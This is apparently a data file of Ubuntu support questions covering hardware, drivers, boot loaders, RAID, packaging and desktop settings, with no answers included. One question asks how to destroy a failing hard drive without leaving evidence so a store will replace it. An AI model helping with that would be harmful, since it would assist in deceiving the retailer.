52804	mercurial central repository at a samba location	i have a remote samba location mounted as /mnt/rua as discussed here . i have created a folder hgrepository there , which is my central mercurial repo . i am working with a local clone and push the setting to this folder . my team-mates do the same on their machines . now , the problem is that mercurial returns abort : could not lock repository /mnt/rua/hgrepository/spectrometry : permission denied if i am trying to do hg push . with hg pull as well as with sudo hg push everything works fine . this would be ok , but the problem is that the nautilus mercurial extension ( tortoisehg ) works in the non-sudo mode , so the context menu command for pushing does n't work . how should i properly change the settings to make it work ? in case it helps , here is what i get for ls -l /mnt drwxrwx -- - 8 1016 users 0 2011-06-10 12:47 rua
52805	what 's the latest , stable version of ubuntu that does n't use unity ?	i 'm looking for the latest , stable version of ubuntu that uses gnome 2 . as much as i understand , newest , stable version - 11.04 - is using unity ... and that 's new desktop environment . is unity a desktop environment ? helped a lot .
52812	q-tec webcam 100 ( 093a:2460 ) video quality is horrible at best	i just bought a new usb webcam for my desktop setup of ubuntu natty narwhal . i plugged it in , started up cheese , and saw my smiling face . but it was green and lined , very poor quality overall . i am skeptical that this is due to a poor quality webcam . : p i tried it in skype , google+ , and gchat , but all of those showed only a black screen . they recognized the webcam as present , but showed no stream from it . kamoso showed a black screen as well , and camorama had even poorer quality than cheese . here are the details for the webcam from lsusb : bus 001 device 005 : id 093a:2460 pixart imaging , inc. q-tec webcam 100 am i missing a driver , or are there settings somewhere i need to tweak ?
52817	system log error when running firestarter configuration program	running latest ubuntu ver . 11.04 . using firestarter firewall configuration ( ver.1.0.3 ) . when firestarter is run , an error message is returned , `` failed to open the system log . no event information will be available '' . also same error msg . is returned in the `` events '' tab within firestater , `` error reading system log ( null ) , file does not exist . '' how is the system log opened/created/started to prevent this error msg ? ?
52819	do apps designed for a different desktop environment ( gnome , xfce , lxde , ... ) break ?	is it true that each app is designed for its own desktop environment ( like gnome , xfce , lxde , etc. ) ? if i try to use an app that 's made for a different desktop than i 'm using ( like using a gnome app in lxde ) , will it break/look ugly or something ? i do n't get it ...
52822	are linksys wireless adapters well suppored on ubuntu ?	ever since ubuntu 8.10 when i first started i could n't get my old linksys wusb54g wireless card to work . at least in 11.04 it somewhat works only when you set a static ip , and even then speeds are pitiful ( the ping time to my router is 10ms ( ! ) , dns takes a while , and bittorrent is painful ) . yesterday i bought a linksys wusb100 only to have the same problems . with these two devices not working , do linksys wireless cards or the ralink modules that power them in general work well in ubuntu ? or is this pretty much the standard experience ? note : i know i can use ndiswrapper but at least with the wusb54g its very flaky and causes lots of kernel panics in both ubuntu and fedora . its also a workaround that i 'd prefer not to rely on note 2 : i 'm asking this since i 'm returning the wusb100 i just bought and needing to know if i can use linksys products in linux
52824	accessing running terminal sessions	i 'm a linux n00b , but it 's something i 'm really trying to learn . let 's say i log in to my server at home directly and start a process . for the sake of specificity , it 's a craftbukkit minecraft server . : ) there were some issues and now i want to restart the game server remotely . how can i log in and up that terminal session that is running the server ? i can access the computer through remote desktop . i can set up ssh if necessary . thanks !
52825	adding seamonkey/firefox extensions to custom livecd	is there a way to add seamonkey extensions to a custom ubuntu livecd ? i 'm working with uck , and i would like to add a language pack extension ( .xpi ) to seamonkey so that the language would be available as the default language of the application in the customized cd .
52829	how do i stop my iphone from being automounted ?	i 'm trying to stop my ubuntu desktop from automatically mounting my iphone when i connect it/plug it in . this causes my vmware workstation to not mount the iphone for syncing . i have used gconf-editor and disabled the automount option yet i 'm still seeing my iphone after reboot : tim @ tim-on-linux64 : ~ $ lsusb bus 002 device 011 : id 05ac:1297 apple , inc. any help would be appreciated ...
52830	install ubuntu without a cd drive	so here is the situation . i own a older mac mini ( intel core duo , 1.66 ghz ) and thus will not be able to update to lion . also the internal cd drive failed about 3 months ago . now i love my mac . & love `` snow leopard '' but i have been playing around a lot with ubuntu , running it in a virtual machine . i think that i can replace all or almost all programs that i now use on the mac . with programs running on ubuntu . since i will not be able to buy new hardware any time soon , and this mac mini is now `` officially '' a low end unsupported machine . i would like to do the following ... .. completely erase the internal hard drive on the mac mini . yet keep a bootable copy of the internal system on an external firewire hard drive ( super duper ) . install and run ubuntu on the internal drive , retaining the ability to boot into mac os 10.6.8 from the external drive . so that i can retain both work environments until i am working 95 % percent of the time in ubuntu . did i say that the internal cd drive failed . yes , it will not read nor write . gone . i am not going to replace it as it would cost more than the mac is worth.. ( apple quoted me $ 130 ) so ... . i have questions ... . ( first about me .. i am not afraid to drop into terminal , have written many apple scripts , an might be called a `` super user '' ) how the bloody hell can i install ubuntu without a working cd drive ? i have tried to make a bootable thumb drive with the iso for ubuntu and boot from that . no luck . will keep trying this as it is probably the best way . but any advice would be helpful . once i get ubuntu up and running on the internal drive will it be difficult to re-boot into the external drive with mac os 10.6.8 ? this is most likely trivial , but i can not test it so i am a little uneasy . if i buy an external cd usb drive can i use that to install ubuntu ? ( about $ 10.00 on e-bay )
52838	what options exist for viewing mp4 tags in list view ?	i have several mp4 videos . when using windows7 explorer i can create a details view ( or list view ) of the mp4 tag information on these videos , which makes it easy to organize them by genre , title , artist , etc . unfortunately , nautilus ca n't read mp4 tag data . nautilus also ca n't read mp3 tag data . although not ideal , a way i sometimes use to work around nautilus ' omission is to use banshee to display the mp3 tags . what solutions exist ( if any ) that will allow me to display mp4 tags of my video files when using ubuntu ? i 'm looking for a details/list like view of the files like a typical file browser would provide or maybe a dedicated video player that can give a list view of files like banshee does with mp3s .
52840	what 's the difference between juju and puppet/chef ?	have tried asking 3rd party about key differences between juju and puppet/chef . 3rd parties are not too familiar with juju and could not say . they simply stated the others have a lot of momentum , and it would be hard to overcome their lead . would those closest to juju be willing to highlight the advantages of this software , and why it will overtake puppet/chef in the config management arena ?
52841	can wine software use unity application menu ?	wine applications which i used show menu under window top border . is there any way to use global application menu in wine applications ? will this function be available in next releases of wine/appmenu possibly ?
52845	what is the shortcut to force a logout ?	i am using the alpha 2 version of 11.10 and the keyboard options there do not have an option to force a logout . can you tell me the keyboard shortcut so i can add it myself ?
52847	upgrade remote server from 9.04 to ubuntu lts	my situation : i 'm stuck with a vps which i have no physical access to . the vps currently runs ubuntu 9.04 and i 'd like to upgrade to 10.04 . how would i go about doing this ? ( a fresh install would be fine . i have a complete backup of the server . ) i 've tried to do do-release-upgrade but it gives can not upgrade . an upgrade from 'jaunty ' to 'lucid ' is not supported with this tool .
52848	desktop does n't login after gdm login unless i restart it	from a couple of days i 'm having a problem with gnome3 gnome-shell . when i reboot / power-on the machine , after the gdm login the de is stuck without opening gnome-shell . if i restart gdm from another tty , then everything works ( gdm restarts and gnome-shell appears ) . so it hangs only the first time i login . i was looking for more information on what is happening , but i ca n't find a gdm or gnome-shell detailed log . any suggestions ? currently using gnome3 ppa + ( ricotz ppa ) + ati open source drivers
52850	why do i get ubuntu classic instead of unity the first time i log in after rebooting ?	recently , my ubuntu natty system has started to log me into ubuntu classic ( i.e . gnome desktop ) instead of unity the first time i log in after a reboot . i have made sure to select `` unity '' from the session menu before logging in . every subsequent login works fine until the next reboot . what is causing this , and how do i fix it ?
52854	canâ´t see my purchased music with ubuntu one music	i have a few days ago bought skrillex as an album via banshee/ubuntu one music store . in banshee `` my downloads '' says : transferring to your ubuntu one storage . this has been true for about three days . i can see the album through the ubuntu one 's web interface under purchased music . but if i try to find the album via ubuntu one music app ( android ) then i can only see/find one song , and not the whole album . the same is valid for some of the none purchased music folders ( in the default music folder ) . my system is : ubuntu 11.04 htc desire a8181 banshee says `` your 'purchased music ' folder is not subscribed . new purchases will not to this computer '' i have tried several times to press the button but nothing happens : my ubuntu one control panel looks like this . but sometimes i get this error ! notiy-box pop up sometimes and says is about 26000 files are being uploaded . but it says all the time 26000 even after several days of uploaded .
52856	how to use a network video stream ( from an ip webcam ) as a webcam	i have a network video stream ( mjpeg ) from an android phone that acts as an ip webcam and i would like to use it as an actual webcam on my pc ( for google talk , skype etc . )
52858	which ubuntu repositories are totally safe and free from malware ?	i read in the news about all the malware that is infecting android os . the malware is in google 's app store and people are unknowingly downloading and installing it . as i understand , ubuntu 's main repository is safe for me to download from ( i wo n't be infected with malware from doing so ) because canonical engineers review the software . but what about other repos , most notably the universe repository ? does the universe repo receive any sort of review to protect from malware ? is it advisable to avoid the universe repo for fear of unknowingly downloading malware from it ? i 've read ppas are particularly dangerous because they are not reviewed . i 'm assuming it is perfectly safe to use the google chrome ppa however . so if i use nothing but the main & universe repositories and google chrome ppa , will i be protected from unknowingly downloading malware ? if ubuntu does gain hundreds of millions of users like mark shuttleworth predicts , wo n't ubuntu ppas become the malware problem for ubuntu like google 's app store is today for android ?
52859	automatically deactivate redshift when playing videos in fullscreen	i 'm using redshift to adjust color temperature according to the position of the sun . when i start to play videos in fullscreen i want it to ( automatically ) be deactivated , and i want it to ( automatically ) be reactivated when i stop watch videos in fullscreen . can this be done ? if so , how ? ideally i want it to work with any player , e.g . with totem and with vlc .
52865	installing 10.10+ with radeon hd 6970 video card	i built a new pc that has a diamond radeon hd 6970 graphics card , and no on-board graphics . when i boot from the ubuntu disc , it runs through some initial booting stuff , and then gets to a loading screen that just has the ubuntu logo and some progress bar/dot thingies . after this screen is finished , it goes black and says it can not display video mode . i 've seen many people that say to simply install the ati drivers . however , i do n't believe this is an option , because i ca n't even get to the boot screen that asks me if i want to run the system off of the livecd , boot to hard disk , etc ... is there a way to somehow boot to a cli before getting to the screen that would normally let me choose that ? i 'm at a loss as far as what to do . also : yes , the cd boots fine on other machines . ( i 've also burnt a couple discs just to be sure ) yes , the graphics card is fine . i normally dual-boot with windows 7 , and it runs on windows just fine . thanks for any help !
52868	my sound and alsa has gone when i installed realtek drivers	i made a confusion with some informations and i thought that i have a realtek audio card , but in really i have an intel 82801fb/fbm/fr/fw/frw ( ich6 family ) high definition audio controller , so when i installed the realtek high definition audio codecs it made a mess with the sound-related files , resuming , in the driver 's readme it says that by default it mutes every audio channel and you is supposed to use some alsa or oss mixer to unmute them , and was in this part i noticed i made this confusion , because i got this trying to unmute the channels : sudo alsamixer returns : can not open the mixer : no such file or directory sudo amixer returns : amixer : mixer attach default error : no such file or directory i already reinstalled every alsa realated package and got nothing , changing sound preferences settings does n't work and there is n't any instructions to how to uninstall the realtek drivers . i know the realtek drivers changed something related to `` sdn '' and `` hda '' . so , how can i fix this problem ?
52870	is there a way to set laptop to hibernate after being suspended for a while ? ( like windows can )	with windows 7 , my laptop was set to go to sleep after x minutes on battery , then hibernate after sleeping for x minutes . i ca n't seem to find a way to do that with ubuntu natty so i always end up with a dead laptop after a day .
52876	how to always boot into a cli environment ?	the title says it all really . i 've got xubuntu 11.04 working as a file server which i ssh into . 90 % of the time it 's headless and therefore requires no gui . i do n't want to install just a bare server however because there are times when i want the graphical environment . how do i best do this ? i 've already set grub_default=1 in /etc/default/grub but this is does n't do what i want as i then drop into an ncurses style menu prior to getting a prompt . i want a normal console .
52881	load ipod touch videos in banshee ?	ok , now i figured out how to sync my music from my ipod touch with banshee on ubuntu 11.04 which was n't that hard in the first place , pretty much plug and play . my question is , is there a way to copy off my movies that i have on my ipod touch into banshee and play them using either banshee or say , vlc player ? i have absolutely no idea if there is a way to do this and so far my searches on google have yielded very few results if any at that ... any help would be greatly appreciated even if it 's a simple , `` nope , ca n't be done ... '' thanks everyone !
52884	does canonical pay application developers ?	when an application becomes default in ubuntu , does canonical pay the developer ( s ) for making it default or do they just use the application for free ?
52890	how to set up virtual hosts for sites in each user 's directory	hi i am looking to set up virtual hosts and i would like to put the files in each user 's directory so i have each user and his sites held separately . so for example john would have in /home/jean/public_html : www.site1.com www.site2.com and tony in home/tony/public_html : www.site3.com www.site4.com www.site5.com can anyone suggest a good tutorial for setting this up with apache ? thanks
52893	front panel headphone plug does n't work	whenever i plug something into my front panel headphone socket , nothing happens . no audio coming out of the head phones , and no mute on the main speakers . system is running natty 64-bit asus p5g43t-m pro intel pentium e5400 / 3 gb ram surround ( 7.1 ) coming out of the analogue rear panel plugs . custom built - i can confirm that i have wired them correctly as they work in windows without issue .
52903	rsyslogd using 197 % cpu for the past few days	i 'm running natty server on the rackspace cloud and rsyslogd as been churning away usin 197 % cpu ( quad core machine i believe ) for the past few days . is there anything i can do to figure out what is going on ?
52904	how to properly remove packages	i would like to uninstall some packages , but i find that after i run the sudo apt-get remove < package-name > command i still have log files or other types of files running around . is there a way i can just remove everything associated ? i even had nginx installed and after i removed it i found that the process was still starting on reboot : s am i doing something wrong ? i 've used the -- purge parameter too and autoremove , but i am still finding folders and files belonging to packages i had uninstalled .
52905	modify fstab to automount external storage correctly	i 'm using eclipse for java development . my work space is in sda1 drive . every time login need to mount the drive after only i can use that work space under sda1 drive . for this i installed storage device manager ( pysdm ) . after installed it eclipse cant use the drive as workspace . so that i uninstalled pysdm . even that problem exist . i can do for this issue ? need your intelligence idea to solve this prob . update 22/11/11 removed pysdm and instead used fstab to automount external disk with correct permissions . appears to have succeeded in using blkid to create proper fstab entry but still can not access the new volume . user4124 . as you asked i 'm posting cat /etc/fstab details . ( adding it as answer here bze ca n't add comment more letters ) silambarasan @ silambarasan-pc : ~ $ cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/sda8 / ext2 errors=remount-ro 0 1 # swap was on /dev/sda7 during installation uuid=81edad8d-06a4-42f4-a485-9ef293b9c0fa none swap sw 0 0 /dev/sda1 /media/sda1 vfat defaults 0 0 /dev/sda5 /media/sda5 vfat defaults 0 0 /dev/sda6 /media/sda6 vfat defaults 0 0 silambarasan @ silambarasan-pc : ~ $
52910	“signal out of range” when starting grub after server installation	i get “signal out of range” displayed on screen after boot up from fresh ubuntu installation , if flashes grup in corner for half a sec then it goes to “no input signal” , anyone got a clue how to get the grub to load in diffrent resolution with out have access to the file system ? if not i guess my only option is to boot from the cd and edit som files to get grub to load in diffrent resolution ? as it is now i cant get access to grub menu , and i cant get access to login screen , all will give me “no input signal” , anyone worked around this ?
52912	how do i get a new drive integrated into my software raid ?	when i first installed ubuntu a couple years ago , i set it up with a software raid using the ubuntu alternate install disk . i have two 500 gb drives in the raid . a few days ago , one of the drives failed . i had to switch the boot order of the drives in the computer 's bios , but other than that , the computer kept on truckin ' . all my data is safe on the remaining drive . i bought a new drive to replace the defective one , and it is installed in my computer . if i look at it with gparted partition manager , i can see it 's there with all its space unallocated . how do i get ubuntu to see it as part of the raid and begin mirroring the other drive ? dave @ homebase : ~ $ sudo fdisk -lu disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00078955 device boot start end blocks id system /dev/sda1 * 63 39070079 19535008+ fd linux raid autodetect /dev/sda2 39070080 46877669 3903795 fd linux raid autodetect /dev/sda3 46877670 781449794 367286062+ fd linux raid autodetect /dev/sda4 781449795 976768064 97659135 83 linux disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sdb does n't contain a valid partition table disk /dev/md2 : 376.1 gb , 376084365312 bytes 2 heads , 4 sectors/track , 91817472 cylinders , total 734539776 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/md2 does n't contain a valid partition table disk /dev/md1 : 3997 mb , 3997368320 bytes 2 heads , 4 sectors/track , 975920 cylinders , total 7807360 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/md1 does n't contain a valid partition table disk /dev/md0 : 20.0 gb , 20003749888 bytes 2 heads , 4 sectors/track , 4883728 cylinders , total 39069824 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/md0 does n't contain a valid partition table dave @ homebase : ~ $ df -h filesystem size used avail use % mounted on /dev/md0 19g 4.5g 13g 26 % / none 1.8g 708k 1.8g 1 % /dev none 1.8g 752k 1.8g 1 % /dev/shm none 1.8g 332k 1.8g 1 % /var/run none 1.8g 0 1.8g 0 % /var/lock /dev/sda4 92g 211m 87g 1 % /tmp /dev/md2 345g 237g 91g 73 % /home 192.168.0.12 : /home/mythbuntu 651g 174g 444g 29 % /home/dave/mythbuntu dave @ homebase : ~ $ cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md0 : active raid1 sda1 [ 1 ] 19534912 blocks [ 2/1 ] [ _u ] md1 : active ( auto-read-only ) raid1 sda2 [ 1 ] 3903680 blocks [ 2/1 ] [ _u ] md2 : active raid1 sda3 [ 1 ] 367269888 blocks [ 2/1 ] [ _u ] unused devices : < none >
52917	vlc media player stable ppa for 10.10 ?	after using both ubuntu 11.04 ( for unity ) and fedora 15 ( for gnome 3 ) , i 've reverted back to ubuntu 10.10 for its better classic gnome experience , and have no plans to upgrade until oneiric releases ( for its unity and gnome 3 compatibility altogether ) , and since 10.10 is older now , the vlc media player in its official repository is way to old , and i 'm looking for ppa that provides latest stable vlc in maverick . so far , i 've tried ppa : ferramroberto/vlc and ppa : n-muench/vlc ppas , and both say that they have vlc 1.1.10 in the repositories , but after adding the ppa and updating the package information , i do not see updated version of vlc in synaptic , also , running sudo apt-get install vlc mozilla-plugin-vlc shows dependency issues and prevents installing anything . so , what 's going wrong ? other working ppa suggestions are welcome . compiling the latest version of vlc manually , or using lucid-bleed ppa ( which is available for 10.04 only but is known to work in 10.10 as well ) would be my last option . thanks .
52921	ubuntu , then windows 7 was installed , how to switch them ?	sorry if i asking old question . i had only ubuntu on my laptop , then i installed windows 7 on other partition . i thought that i will be choosing os when computer boots , but it always loads windows 7 and do n't give any choose option . from ancient times it was normal to have xp , then install linux , it always give choose option , but now i do n't know how to configure that things .
52925	`` command 'gcc ' failed '' when trying to install a python package from pypi	i 'm trying to install 'pyskein ' from the python package index ( sudo easy_install3 skein ) , but the installation fails with this error : src/threefish.c:23:20 : fatal error : python.h : no such file or directory compilation terminated . error : setup script exited with error : command 'gcc ' failed with exit status 1 i 've already installed the build-essential package
52928	quickly rename current workspace	i can rename my workspace by going into my workspace switcher preferences : does anyone know a quicker way to rename my current workspace ( maybe something with gnomedo ) ?
52933	two finger scrolling on touchpad	i can scroll with 2 fingers with my touchpad on win7 but when i switch to ubuntu 10.04 it does n't work , the option is greyed out . could anyone help ? my touchpad is synaptics v7.2 ps/2 port
52934	what voip servers for ubuntu can i find that have very low latency	i have used mumble and teamspeak in the ubuntu server . mumble is suppose very low latency but the client is horrible . at least compared to teamspeak . the memory usage was good . the configuration and installation was a little complicated . for teamspeak the low latency is not as better as mumble but the client is very good . what other low latency voip server for ubuntu exist and how is the look and feel for their client and the quality for their server .
52935	acer aspire 4820tg graphic card driver	my ati radeon video card still has quite bad performance in ubuntu 11.04 my laptop is acer aspire 4820tg my graphic card is ati mobility radeon 5650
52958	a simple email autoresponder	i have a pop3 email account , that i do not use anymore . it is on a server out of my control . several of my contacts keep on sending email to that address , though i told them . so i decided to set an autoresponse saying `` i do not read at this address anymore , write to that other address '' . i need a little process running on one of my always-up machines that fetches emails from the server and answers , to that coming from one of my contact , with a standard response . i am looking for a solution simple to setup , like fetchmail + mailx + some bash scripting .
52960	notify-send does nothing , yet , libnotify is installed	i am trying to use notify-send , but it does n't display . i am reasonably sure i have the correct packages installed , but i am not expert in configuring the notification settings . i know i have some sort of notification package working - i get notifications from pidgin ( sporadically ) . what is the correct configuration for notify-send to operate correctly ? i have libnotify-bin installed i have the notification-daemon installed
52963	how do i set windows to boot as the default in the boot loader ?	how do i set the bootloader so that in my dualboot with windows 7/ubuntu 11.04 , windows start up as standard instead of ubuntu ?
52965	thunar-archive-plugin not working	after i experienced serious not yet resolved performance issues with nautilus i decided to move to xubuntu so i installed its metapackage from ubuntu and started using it . it turns out that the archive plugin for thunar ( provides the `` extract here '' option in the contextual menu when right clicking over a compressed archive ) is not working , even after i apt-get purged it and reinstalled . it simply does n't show its options in the contextual menu . what should i do to make it work ?
52970	authoring a dvd into an image file , from command line	i would like to convert a whatever-type video file into an iso image i could then burn to a dvd ( on another computer ) - so that the final disc is playable on a regular dvd player . i already have ffmpeg installed with medibuntu , and mpeg output support does seem to work . is there a command line tool , or a simple script that i could use to do this ?
52971	what is a user-friendly way to log off other users ?	what is the ubuntu equivalent of this interface ? i am looking for a user-friendly method that the owner of a computer can use to log off other users without having to restart . the case i 'm concerned about is of the beginner-level user who needs administrative control over the computer because they are the owner , but probably is n't concerned with most of the tasks we would usually associate with system administration .
52974	how to make alt-tab diplay names of the program/window title ?	when switching between programs using alt-tab i prefer the program/window title to be displayed as well as the picture of the program . this is especially useful when i have multiple editor windows open and want to alt-tab to another file . presently i must try to peer at the content of the small picture of the program ... not at all ideal .
52978	problem with the display after moving hard drive from one laptop to another	i am having a problem with the display on my laptop running ubuntu 10.04 since last few days , i am using the laptop in low-graphics mode . when i try to run the command glxinfo , i get a error message xlib extension glx missing on display ! :1.0 and causes a segmentation fault . i am using toshiba laptop with 945gm/gms , 943/940gml express integrated graphics controller ( output from lshw ) note : i was using sony laptop with nvidia graphics card . i took the hdd from sony laptop and put it in toshiba laptop having intel chipset graphics card . since then , i am having the problem with the display . i tried to remove the drivers from nvidia but with no success . please let me know , how to remove the nvidia drivers completely and install intel drivers .
52982	banshee messes up album artwork when syncing with ipod	i just did a fresh install of ubuntu 11.04 and used banshee to sync my music from my ipod onto my computer . when i turned my ipod back on ( it 's jailbroken ) the album artwork was messed up and placed to incorrect albums , but on banshee the album artwork is placed to each correct album . how do i fix this ?
52984	should i install unsigned packages ?	yesterday when i tried to update packages , i received a message asking me if i want to install an unsigned package . i clicked no and stopped the update . today i updated all packages without the message . so , what are unsigned packages and should i install them ? i 've done a sudo apt-get update to update the package lists and i still get the error i am not using any ppas
52986	how to add a system call to the linux kernel ?	i 'm currently reading operating system concepts 7th edition by silberschartz , galvin and gagne . at the end of chapter 2 , there is an exercise `` add a system call to the linux kernel '' . unfortunately , i realized the directory structure that the authors used is completely different with ubuntu 's one . for example , the authors referred to `` /usr/src/linux-2.x/include/asm-i386/unistd.h '' , but on my machine , they are : /usr/src/linux-headers-2.6.38-10 /usr/src/linux-headers-2.6.38-10-generic and inside this folder , i could n't find anything called `` asm-i386 '' : ( . i wonder is there a documentation specified for ubuntu ? any suggestion would be greatly appreciated . thank you ,
52987	does the kernel 2.6.38-10-generic plug a memory hole ?	on my ubuntu 11.04 64-bit system , this morning the update manager wanted to install the 2.6.38-10-generic kernel , so i let it . i have n't noticed any difference except that memory no longer seems to leak . usually , after awhile the memory usage increases gradually and does n't drop much , even when i close programs , but since installing the new kernel it seems to return to `` normal '' ( about where it was after reboot ) when i close programs . of course , i do n't really know if this is due to the kernel or to something else . does someone out there know if this was a fix in the kernel ? i 'm glad for the improvement , but do n't really know what brought it about .
53001	how do i add eclipse indigo to the launcher ?	i know how to download eclipse , and i figured i would put it in /opt , but how can i get it in the launcher ? i suppose i will need to uninstall the old eclipse , but will the new eclipse installation show up in the launcher , etc . ?
53014	why use sbuild over pbuilder ?	there are numerous ways to build debian packages in a clean and reproducible environment . two of the most frequently used are pbuilder and sbuild . personally , i 've always used pbuilder . i find pbuilder much easier to use and maintain . i have n't been able to find any side by side comparison of the two . what am i missing out on ? what advantages are there in using sbuild over pbuilder ?
53018	is it possible to run gnome 3 without 3d acceleration hardware ?	if i do n't have a hardware that supports 3d acceleration , is it possible to run gnome 3 ? if no , is there some work on it and where i can go to get tunned about the progress of it ? just one extra doubt : i run unity 3d not unity 2d , but my hardware does n't support 3d acceleration , is it possible ? if no , maybe my hardware supports it , but i just do n't know and if it 's true , why i ca n't set gnome 3 to run ? [ added ] /usr/lib/nux/unity_support_test -p returns : opengl vendor string : tungsten graphics , inc opengl renderer string : mesa dri intel ( r ) 915gm gem 20100330 development x86/mmx/sse2 opengl version string : 1.4 mesa 7.10.2 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity supported : yes so , yes my hardware seems to support 3d hardware acceleration ( omg ! this dinosaur has it 's tricks ! i just ca n't believe ) , well i always stay happy with sooo many yeses and no errors =d glad ! resuming , i really want to use gnome 3 , not gnome-shell or fallback , so , what is missing ? maybe my 480mb ram memory ? or my celeron m at 1.6ghz ? ? ?
53019	how to watch videos that have 1080p , using x264 video codec and ac3 for audio ?	ă 'm trying to play some videos which were encoded using the x264 video codec with 1080p but using vlc it plays like a slideshow . do you think that the cause of this problem is because of my low-spec laptop ? ( intel core duo t5800 @ 2ghz )
53022	is there a way to kill my hard drive ?	i know this sounds odd but the story is that my hard drive have 16 bad sectors last check went up to 22 ( back up already all info ) the hard drive warranty it 's over ( 4 years old ) but the store told me it can change my hard drive for a new one as long as this one is dead . bad sectors wont make them change as `` still working '' . so how can i kill the hard drive with out physical evidence ( opening , smashing etc ) that will void for sure the deal i have . as odd as it sounds is my best shot to get a new one instead of waiting for this one to die ( i been 3 months with this issue already ) self-test of disk utility failed to read at 10 % now . any ideas ?
53027	how can i set the default log in session ?	i am using 11.04 with gnome 3 installed . before i log in i am prompted to choose in which environment i want to log in . among the possible selections is gnome , how can i set the default choice ?
53028	webcam not detected by flash	i 'm using chrome 's integrated flash plugin ( 10. something ) under ubuntu 11.04 x64 , and cant get the camera work with flash ( example : have a webchat via google talk on gmail ) . i get the message `` camera not detected '' . the camera does work in cheese ( in black and white though ) . any ideas ?
53031	how can i install 10.10 's light themes in 10.04 ?	as the title of the question says , how can i install the version of the light themes from maverick in 10.04.2 64 bit ? i 've followed these instructions but i do n't see any difference after restarting , and when running apt-get install gtk2-engines-murrine and apt-get install light-themes , it only says that it 's already at the newest version .
53032	how can i disable the universal access settings icon ?	in gnome 3 on the top right corner i have this universal access icon with all these options which i am not intending to use in the meanwhile . how can i disable/hide the useless for me icon there ?
53038	how do i remap the caps lock key ?	in the past the past i used to use xmodmap to prevent the caps lock button from working , and then tell launchy to handle the key press instead . i ca n't seem to do this anymore . what is the best way to disable caps lock 's normal behavior , and make it do something else ?
53042	installing ubuntu on a sata drive	i 'm trying to install ubuntu 10.04 on a sata drive on a desktop computer . it 's a 2 tb hitachi . if i go through the standard install process , i get an fsync error . the drive showed up in the installer . when i swapped to the terminal and did an fdisk -l , it showed the other drives , but instead of sda , i got another error message that was also in dmesg : [ 243.128549 ] end_request : i/o error , dev sda , sector 3907029152 [ 243.128648 ] sd 3:0:0:0 : [ sda ] unhandled error code [ 243.128652 ] sd 3:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 243.128656 ] sd 3:0:0:0 : [ sda ] cdb : read ( 10 ) : 28 00 e8 e0 87 20 00 00 08 00 dmesg had about 250 copies of those four lines . i checked this question , and even checked the bios settings , but i could n't find anything helpful , so i turn to the mighty collective wisdom of the se network . any ideas about what 's wrong ? need more info ? thanks !
53050	installed local postfix , thunderbird unable to use it	in ubuntu 2011.04 , i want to install an smtp server for development tests , so i did this : sudo apt-get install postfix choosed local because i only want to access it from my computer entered nico ( my machine 's name , pingable ) as mail host name postfix is running as confirmed by sudo /etc/init.d/postfix status . problem : i configured thunderbird to use my nico as an smtp server with user nico , but when i send an email a popup appears saying : send message error . sending of message failed . the message could not be sent because connecting to smtp server nico failed . the server may be unavailable or is refusing smtp connections . please verify that your smtp server settings are correct and try again , or contact the server administrator . did i forget something ? i was following the simple steps from this blog post ( i skipped the `` further configuration '' part ) .
53054	i can not find /sys/kernel/debug/vgaswitcheroo/switch	i have enable switcheroo in kernel config . why is there not /sys/kernel/debug/vgaswitcheroo/switch ? linux ubuntu-raid-w500 2.6.38-10-generic # 46-ubuntu smp tue jun 28 15:07:17 utc 2011 x86_64 x86_64 x86_64 gnu/linux my computer is thinkpad w500 . one graphic card is ati mobility firegl v5700 ( 512 mb ) . the other one is intel graphics media accelerator 4500mhd . i am using official kernel 2.6.38-10 , i do not customize it . i add kernel option pcie_aspm=force in grub_cmdline_linux_default of /etc/default/grub setting modeset=1 does n't seem to help here is the output of kern.log here is my entire bootup .
53059	how do i remove suhosin ?	in my phpmyadmin i am seeing a warning message about suhosin being installed , how can i remove this or disable it ?
53071	how to grep for tabs without using literal tabs and why does \t not work ?	when i search for tabs in a file with ( e ) grep i use the litteral tab ( ^v + < tab > ) . i can not utilize \t as a replacement for tabs in regular expressions . with e.g . sed this expression works very well . so is there any possibility to use a non-litteral replacement for < tab > and what are the backgrounds for a non working / not interpreted \t ?
53072	how to run a .exe from msdn to download the software-fix from wine ?	i had dual boot of windows 7 and ubuntu 10.10 . unfortunately my windows 7 crashed and i am trying to download the software from msdn using linux . the problem is that i downloaded the exe that they send for the downloading purposes but even after installing wine the download does not progresses . is there any other way i can run that exe to download the software ? thanks a lot
53073	data recovery software for windows + linux platform	do you know of any good data recovery software on linux platform that would work on windows drive . i had some really important stuff deleted and then my windows crashed so i need to get it back . please suggest any that may help . or should i go and run them on wine ? i also want to know if i can run any of those exe on wine and if somebody has tried that . thanks a lot ...
